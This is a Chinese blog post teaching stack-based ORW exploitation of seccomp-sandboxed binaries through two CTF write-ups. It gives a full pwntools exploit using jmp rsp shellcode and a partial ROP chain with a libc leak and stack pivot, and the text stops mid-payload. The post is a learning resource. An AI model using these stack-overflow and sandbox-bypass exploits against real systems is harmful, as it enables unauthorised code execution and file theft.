<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/default/favicon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/default/favicon.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/default/favicon.png">
  <link rel="mask-icon" href="/images/default/favicon.png" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"kubansec.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.22.0","exturl":true,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.xml","localsearch":{"enable":true,"top_n_per_article":1,"unescape":false,"preload":false,"trigger":"auto"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="前置知识：沙箱保护和ORW沙箱保护 SandBox正常情况下，程序可以使用所有的syscall，但其实这是不安全的，我们可以劫持程序流后通过execve的syscall来getshell。如果不想让程序去执行execve，我们可以这样做：将程序放入一个沙箱中，在这个沙箱中添加一条规则——禁用execve函数。在这个沙箱中的程序只要调用了execve的系统调用，直接给他中断掉，这就是沙箱sandbo">
<meta property="og:type" content="article">
<meta property="og:title" content="栈上ORW学习总结">
<meta property="og:url" content="http://kubansec.github.io/posts/1d47/index.html">
<meta property="og:site_name" content="Kuban&#39;s blog">
<meta property="og:description" content="前置知识：沙箱保护和ORW沙箱保护 SandBox正常情况下，程序可以使用所有的syscall，但其实这是不安全的，我们可以劫持程序流后通过execve的syscall来getshell。如果不想让程序去执行execve，我们可以这样做：将程序放入一个沙箱中，在这个沙箱中添加一条规则——禁用execve函数。在这个沙箱中的程序只要调用了execve的系统调用，直接给他中断掉，这就是沙箱sandbo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-1.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-2.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-3.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-4.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-5.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-6.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-7.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-8.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-9.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-10.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-11.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-12.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-13.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-14.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-15.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-16.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-17.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-18.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-19.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-20.png">
<meta property="og:image" content="http://kubansec.github.io/images/p2/image-21.png">
<meta property="article:published_time" content="2024-11-12T05:54:01.000Z">
<meta property="article:modified_time" content="2025-04-07T12:00:14.899Z">
<meta property="article:author" content="KubanSec">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="ORW">
<meta property="article:tag" content="极客大挑战_2019_Not_Bad">
<meta property="article:tag" content="HGAME_2023_week1_orw">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://kubansec.github.io/images/p2/image-1.png">


<link rel="canonical" href="http://kubansec.github.io/posts/1d47/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://kubansec.github.io/posts/1d47/","path":"posts/1d47/","title":"栈上ORW学习总结"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>栈上ORW学习总结 | Kuban's blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Kuban's blog</p>
      <i class="logo-line"></i>
    </a>
      <img class="custom-logo-image" src="/images/default/favicon.png" alt="Kuban's blog">
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">30</span></a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">3</span></a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">10</span></a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
      <div class="search-header">
        <span class="search-icon">
          <i class="fa fa-search"></i>
        </span>
        <div class="search-input-container">
          <input autocomplete="off" autocapitalize="off" maxlength="80"
                placeholder="搜索..." spellcheck="false"
                type="search" class="search-input">
        </div>
        <span class="popup-btn-close" role="button">
          <i class="fa fa-times-circle"></i>
        </span>
      </div>
      <div class="search-result-container">
        <div class="search-result-icon">
          <i class="fa fa-spinner fa-pulse fa-5x"></i>
        </div>
      </div>
    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E7%BD%AE%E7%9F%A5%E8%AF%86%EF%BC%9A%E6%B2%99%E7%AE%B1%E4%BF%9D%E6%8A%A4%E5%92%8CORW"><span class="nav-number">1.</span> <span class="nav-text">前置知识：沙箱保护和ORW</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B2%99%E7%AE%B1%E4%BF%9D%E6%8A%A4-SandBox"><span class="nav-number">1.1.</span> <span class="nav-text">沙箱保护 SandBox</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%B2%99%E7%AE%B1%E6%A3%80%E6%B5%8B"><span class="nav-number">1.2.</span> <span class="nav-text">沙箱检测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ORW"><span class="nav-number">1.3.</span> <span class="nav-text">ORW</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BE%8B1%EF%BC%9AORW-shellcode-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Not-Bad"><span class="nav-number">2.</span> <span class="nav-text">例1：ORW_shellcode [极客大挑战 2019]Not Bad</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90"><span class="nav-number">2.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF"><span class="nav-number">2.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#jmp-rsp%E5%88%B0%E5%BA%95%E6%9C%89%E4%BB%80%E4%B9%88%E7%94%A8%E5%91%A2%EF%BC%9F"><span class="nav-number">2.3.</span> <span class="nav-text">jmp rsp到底有什么用呢？</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EXP"><span class="nav-number">2.4.</span> <span class="nav-text">EXP</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BE%8B2%EF%BC%9AORW-ROP-HGAME-2023-week1-orw"><span class="nav-number">3.</span> <span class="nav-text">例2：ORW_ROP [HGAME 2023 week1] orw</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90-1"><span class="nav-number">3.1.</span> <span class="nav-text">程序分析</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF-1"><span class="nav-number">3.2.</span> <span class="nav-text">思路</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#EXP-1"><span class="nav-number">3.3.</span> <span class="nav-text">EXP</span></a></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">KubanSec</p>
  <div class="site-description" itemprop="description">唯有自由不可辜负</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">30</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="cc-license animated" itemprop="license">
    <span class="exturl cc-opacity" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://kubansec.github.io/posts/1d47/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="KubanSec">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Kuban's blog">
      <meta itemprop="description" content="唯有自由不可辜负">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="栈上ORW学习总结 | Kuban's blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          栈上ORW学习总结
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-11-12 13:54:01" itemprop="dateCreated datePublished" datetime="2024-11-12T13:54:01+08:00">2024-11-12</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-04-07 20:00:14" itemprop="dateModified" datetime="2025-04-07T20:00:14+08:00">2025-04-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/pwn%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index"><span itemprop="name">pwn学习</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>7.8k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>7 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h1 id="前置知识：沙箱保护和ORW"><a href="#前置知识：沙箱保护和ORW" class="headerlink" title="前置知识：沙箱保护和ORW"></a>前置知识：沙箱保护和ORW</h1><h2 id="沙箱保护-SandBox"><a href="#沙箱保护-SandBox" class="headerlink" title="沙箱保护 SandBox"></a>沙箱保护 SandBox</h2><p>正常情况下，程序可以使用所有的syscall，但其实这是不安全的，我们可以劫持程序流后通过execve的syscall来getshell。<br>如果不想让程序去执行execve，我们可以这样做：将程序放入一个沙箱中，在这个沙箱中添加一条规则——禁用execve函数。在这个沙箱中的程序只要调用了execve的系统调用，直接给他中断掉，这就是沙箱sandbox的作用。</p>
<p>SandBox的实现一般有两种，一种是<span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vTDBnNG4tYmxvZy9wLzEyODM5MTcxLmh0bWw=">seccomp()函数调用<i class="fa fa-external-link-alt"></i></span>，另一种是<span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ0ODQ2MzI0L2FydGljbGUvZGV0YWlscy8xMjE3MzE2NDA=">prctl()函数调用<i class="fa fa-external-link-alt"></i></span></p>
<span id="more"></span>

<h2 id="沙箱检测"><a href="#沙箱检测" class="headerlink" title="沙箱检测"></a>沙箱检测</h2><p>首先安装seccomp-tools</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo apt install gcc ruby-dev</span><br><span class="line">sudo gem install seccomp-tools</span><br></pre></td></tr></table></figure>
<p>工具用法：seccomp-tools dump “程序”<br><img src="/./images/p2/image-1.png"><br>可以看到程序如果调用了execve或execveat，会跳转到0004，然后被KILL掉，也就是程序禁用了execve和execveat <strong>（system函数实质上也是调用了execve函数，所以也禁用了system函数）</strong> </p>
<h2 id="ORW"><a href="#ORW" class="headerlink" title="ORW"></a>ORW</h2><p>想想我们以前是怎么拿到flag的？我们是先get shell，然后在shell中去执行我们想要的操作（cat &#x2F;flag），但如果程序禁用了execve，能不能跳过get shell的步骤，去直接拿到flag呢？</p>
<p>这就是ORW（open,read,write）的攻击方式：open打开目标的flag文件，read读取flag文件，write显示flag文件的内容。</p>
<p><strong>open()：打开文件</strong></p>
<blockquote>
<p>函数原型：int open(char <em>path,int access);<br>char <em>path——要打开的包含路径的文件名<br>int access——打开方式(只读模式、只写模式 、读写模式)——**设为0-只读模式</em></em><br>返回值： 成功  返回fd ，失败  返回-1</p>
</blockquote>
<p><strong>read()：读取文件内容</strong></p>
<blockquote>
<p>函数原型： int read(int fd,void <em>buf,int len);<br>int fd——文件描述符——*<em>设为open的返回值fd，一般为3，表示从打开的文件中读取内容</em></em><br>void *buf——为要将读取的内容保存的缓冲区<br>int len——读取文件的长度<br>返回值：返回实际读取的字节数</p>
</blockquote>
<p><strong>write()：写文件</strong></p>
<blockquote>
<p>函数原型： int write(int fd,void <em>buf,int len);<br>int fd——文件描述符——*<em>设为1,表示写</em></em><br>void *buf——要写入的内容<br>int len——要写入的长度<br>返回值：返回实际写入文件内容的长度</p>
</blockquote>
<p>栈上的orw根据利用方式分为orw_shellcode型和orw_ROP型，通过两个例题入手</p>
<h1 id="例1：ORW-shellcode-极客大挑战-2019-Not-Bad"><a href="#例1：ORW-shellcode-极客大挑战-2019-Not-Bad" class="headerlink" title="例1：ORW_shellcode [极客大挑战 2019]Not Bad"></a>例1：ORW_shellcode [极客大挑战 2019]Not Bad</h1><blockquote>
<p>题目链接：<span class="exturl" data-url="aHR0cHM6Ly9idXVvai5jbi9jaGFsbGVuZ2Vz">https://buuoj.cn/challenges<i class="fa fa-external-link-alt"></i></span></p>
</blockquote>
<h2 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h2><p>checksec;file，64位，保护全关——没有开NX保护，可以在栈上写shellcode<br><img src="/./images/p2/image-2.png"><br>IDA里面看到有三个函数，并在0x123000处开辟了0x1000的<strong>可写可执行</strong>的空间<br><img src="/./images/p2/image-3.png"></p>
<p>第一个函数开启了seccomp函数，将他重命名为seccomp_init</p>
<p><img src="/./images/p2/image-4.png"><br>第二个函数是设置缓存区，不用管<br><img src="/./images/p2/image-5.png"><br>第三个函数就是我们的vuln函数了，buf这里可以看到一个明显的栈溢出，溢出长度为0x18字节<br><img src="/./images/p2/image-6.png"></p>
<p>另外我们找到了一个 jmp rsp 汇编指令的地址，这个jmp rsp到底有什么用呢？我们在后面讲一下<br><img src="/./images/p2/image-7.png"><br>既然开启了沙箱保护，那我们就用seccomp-tools看一下，可以看到函数允许了open,write,read函数，可以通过ORW的方式去获取到flag的内容<br><img src="/./images/p2/image-8.png"></p>
<h2 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h2><p>溢出的长度只有0x18，是不够我们写入shellcode的，但是mmap为我们在0x123000开始的位置提供了很大一片空间，那么就可以用read函数在这块空间写入我们的shellcode（shellcode写什么？当然是open打开flag、read写入flag、write输出flag）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mmap = 0x123000</span><br><span class="line">orw = shellcraft.open(&#x27;./flag&#x27;)        </span><br><span class="line">orw+ = shellcraft.read(3,mmap,0x100)      </span><br><span class="line">orw+ = shellcraft.write(1,mmap,0x100)</span><br><span class="line">payload = cyclic(0x20+8) + asm(shellcraft.read(0,mmap,0x100))</span><br></pre></td></tr></table></figure>
<p>这样send(payload)之后我们再send(orw)，就向mmap的空间写入了我们的shellcode，但是接下来的问题就是如何跳转到这里执行shellcode。这里就可以讲一下jmp rsp的作用</p>
<h2 id="jmp-rsp到底有什么用呢？"><a href="#jmp-rsp到底有什么用呢？" class="headerlink" title="jmp rsp到底有什么用呢？"></a>jmp rsp到底有什么用呢？</h2><p>调试看一下正常情况的vuln函数结束前后的栈结构，在leave;ret之前rsp的地址为0xddc0<br><img src="/./images/p2/image-9.png"><br>leave，将rsp移到了rbp并+8<br><img src="/./images/p2/image-10.png"><br>ret，rsp再+8<br><img src="/./images/p2/image-11.png"></p>
<p><code>rsp</code>从<code>0xddc0</code>的位置来到了<code>0xddf0</code>的位置，想象一下如果我们将<code>ret</code>覆盖为<code>jmp rsp</code>，并且在后面跟上<code>sub rsp,offset;jmp rsp</code>，那么：</p>
<ol>
<li>程序的执行流<code>rip</code>来到<code>0xddf0</code>，先执行<code>jmp rsp</code>这条指令。</li>
<li>随后<code>rip+8</code>执行下面的<code>sub rsp,offset</code></li>
<li>然后执行<code>jmp rsp</code>，<code>rip</code>来到<code>0xddf0-offset</code>。</li>
</ol>
<p>可以看到，<code>sub rsp,offset;jmp rsp</code>实际上控制了<code>eip</code>，如果我们将<code>rsp-offset</code>的值设为shellcode地址，那么自然程序就会去执行我们的shellcode了。</p>
<p>那么我们就知道该如何进行跳转了，把填充垃圾数据的部分利用起来，看看下边右图的栈结构<br><img src="/./images/p2/image-12.png"><br>在栈顶写入read(0,mmap,0x100);mov rax;0x123000;call rax，填充垃圾数据，然后将ret覆盖为jmp esp，那么rip重新指向现在的rsp的值，接下来rsp-0x30（0x30&#x3D;填充的0x28+rsp自增的8），回到绿色的那两行，这两行用来做什么的？向read读入我们的orw，并且call调用它</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload = asm(shellcraft.read(0,mmap,0x100)) +asm(&#x27;mov r15,0x123000;call r15&#x27;)</span><br><span class="line">payload = payload.ljust(0x28,b&#x27;\x90&#x27;)</span><br><span class="line">payload += p64(jmp_rsp) + asm(&#x27;sub rsp,0x30;jmp rsp&#x27;)</span><br></pre></td></tr></table></figure>

<blockquote>
<p>其实call rax和jmp rax都可以，区别如下：<br>call会把他的下一条指令的地址压入堆栈，然后跳转到他调用的开始处，同时ret会自动弹出返回地址。<br>JMP只是简单的跳转<br>call的本质相当于push+jmp  ret的本质相当于pop+jmp</p>
</blockquote>
<h2 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line">context.arch = &#x27;amd64&#x27;</span><br><span class="line">io = remote(&#x27;node5.buuoj.cn&#x27;,28895)</span><br><span class="line">elf = ELF(&#x27;./bad&#x27;)</span><br><span class="line">jmp_rsp = 0x400A01</span><br><span class="line">mmap = 0x123000</span><br><span class="line">orw = shellcraft.open(&#x27;./flag&#x27;)</span><br><span class="line">orw += shellcraft.read(3,mmap,0x100)</span><br><span class="line">orw += shellcraft.write(1,mmap,0x100)</span><br><span class="line">orw = asm(orw)</span><br><span class="line">payload = asm(shellcraft.read(0,mmap,0x100)) +asm(&#x27;mov r15,0x123000;call r15&#x27;)</span><br><span class="line">payload = payload.ljust(0x28,b&#x27;\x90&#x27;)</span><br><span class="line">payload += p64(jmp_rsp) + asm(&#x27;sub rsp,0x30;jmp rsp&#x27;)</span><br><span class="line">io.recvline()</span><br><span class="line">io.send(payload)</span><br><span class="line">io.send(orw)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h1 id="例2：ORW-ROP-HGAME-2023-week1-orw"><a href="#例2：ORW-ROP-HGAME-2023-week1-orw" class="headerlink" title="例2：ORW_ROP [HGAME 2023 week1] orw"></a>例2：ORW_ROP [HGAME 2023 week1] orw</h1><blockquote>
<p>题目链接：<span class="exturl" data-url="aHR0cHM6Ly93d3cubnNzY3RmLmNuL3Byb2JsZW0vMzQ4OQ==">https://www.nssctf.cn/problem/3489<i class="fa fa-external-link-alt"></i></span></p>
</blockquote>
<h2 id="程序分析-1"><a href="#程序分析-1" class="headerlink" title="程序分析"></a>程序分析</h2><p>先把ld和libc链接到程序</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kuban@kuban-virtual-machine:~/Desktop/pwn/test/orw$ patchelf --set-interpreter /home/kuban/Desktop/pwn/test/orw/ld-2.31.so vuln </span><br><span class="line">kuban@kuban-virtual-machine:~/Desktop/pwn/test/orw$ patchelf --replace-needed libc.so.6 /home/kuban/Desktop/pwn/test/orw/libc-2.31.so vuln</span><br><span class="line">kuban@kuban-virtual-machine:~/Desktop/pwn/test/orw$ ldd vuln </span><br><span class="line">        linux-vdso.so.1 (0x00007fff70b25000)</span><br><span class="line">        /home/kuban/Desktop/pwn/test/orw/libc-2.31.so (0x000076c7d729c000)</span><br><span class="line">        /home/kuban/Desktop/pwn/test/orw/ld-2.31.so =&gt; /lib64/ld-linux-x86-64.so.2 (0x000076c7d7490000)</span><br></pre></td></tr></table></figure>

<p>checksec;file，64位，开启NX保护<br><img src="/./images/p2/image-13.png"><br>IDA里面看一下<br>main函数开启了一个沙箱，输出一行后调用vuln函数<br><img src="/./images/p2/image-14.png"><br>vuln函数就是一个非常简单的栈溢出，溢出长度有0x30个字节<br><img src="/./images/p2/image-15.png"><br>检测一下沙箱，可以看到函数禁用了execve函数<br><img src="/./images/p2/image-16.png"><br>记录一下gadget<br><img src="/./images/p2/image-17.png"></p>
<h2 id="思路-1"><a href="#思路-1" class="headerlink" title="思路"></a>思路</h2><p>这道题主要有四个问题需要解决</p>
<ol>
<li><p>禁用了execve<br>解决方法：当然是orw啦</p>
</li>
<li><p>程序没有open、write函数<br>解决方法：用puts泄露libc，在libc中找到open,write并且返回到vuln函数继续下一步的利用</p>
</li>
<li><p>栈溢出长度只有0x28，不够写入ROP链<br>解决方法：利用leave_ret gadget将栈迁移到bss段<br><img src="/./images/p2/image-18.png"></p>
</li>
<li><p>我们open之后，read和write要用到rdi,rsi和rdx三个寄存器传参，可是我们没有控制rdx的gadget？<br>解决办法：使用libc里面的rsi和rdx，libc_base+[libc_rsi&#x2F;rdx] 就可以了（具体看一下exp应该就懂了）<br><img src="/./images/p2/image-19.png"></p>
<blockquote>
<p>其实对于问题3，我们也可以在libc中找到pop rsp的指令实现栈迁移，大家伙儿感兴趣可以试试</p>
</blockquote>
</li>
</ol>
<p>那么我们就可以分三步走<br>第一步：泄露libc，找到open,write并且返回到vuln函数，为第二步中read的buf迁移做准备。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">pop_rdi = 0x401393</span><br><span class="line">ret = 0x40101a</span><br><span class="line">leave_ret = 0x4012be</span><br><span class="line">libc_dump_rsi = 0x2601f</span><br><span class="line">libc_dump_rdx = 0x142c92</span><br><span class="line"></span><br><span class="line">payload1 = cyclic(0x100+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln_addr)</span><br><span class="line">io.sendafter(&#x27;before you try to solve this task.&#x27;,payload1)</span><br><span class="line">puts_addr = u64(io.recvuntil(&#x27;\x7f&#x27;)[-6:].ljust(8,b&#x27;\x00&#x27;))</span><br><span class="line">success(hex(puts_addr))</span><br></pre></td></tr></table></figure>
<p>计算libc基地址，写出目标中我们需要的函数和gadget的地址</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">libc_base = puts_addr - libc.symbols[&#x27;puts&#x27;]</span><br><span class="line">open_addr = libc_base + libc.symbols[&#x27;open&#x27;]</span><br><span class="line">read_addr = libc_base + libc.symbols[&#x27;read&#x27;] # read_addr = elf.plt[&#x27;read&#x27;]</span><br><span class="line">write_addr = libc_base + libc.symbols[&#x27;write&#x27;]</span><br><span class="line">pop_rsi = libc_base + libc_dump_rsi</span><br><span class="line">pop_rdi = libc_base + libc_dump_rdi</span><br></pre></td></tr></table></figure>

<p>第二步：第一步完成后程序回到了vuln函数即将执行read(0, buf, 0x130uLL); 看一下汇编，可以看到这个read 写入的位置在 rbp-0x100 的位置<br><img src="/./images/p2/image-20.png"></p>
<p>我们想要向bss段写入我们的orw，那么我们可以将rbp迁移到newrbp&#x3D;bss+0x200的位置，read就会向newrbp-0x100的位置写入数据了，我们的payload2这样构造</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">newrbp = elf.bss(0x200)</span><br><span class="line">payload2 = cyclic(0x100) + p64(newrbp) + p64(?)</span><br></pre></td></tr></table></figure>

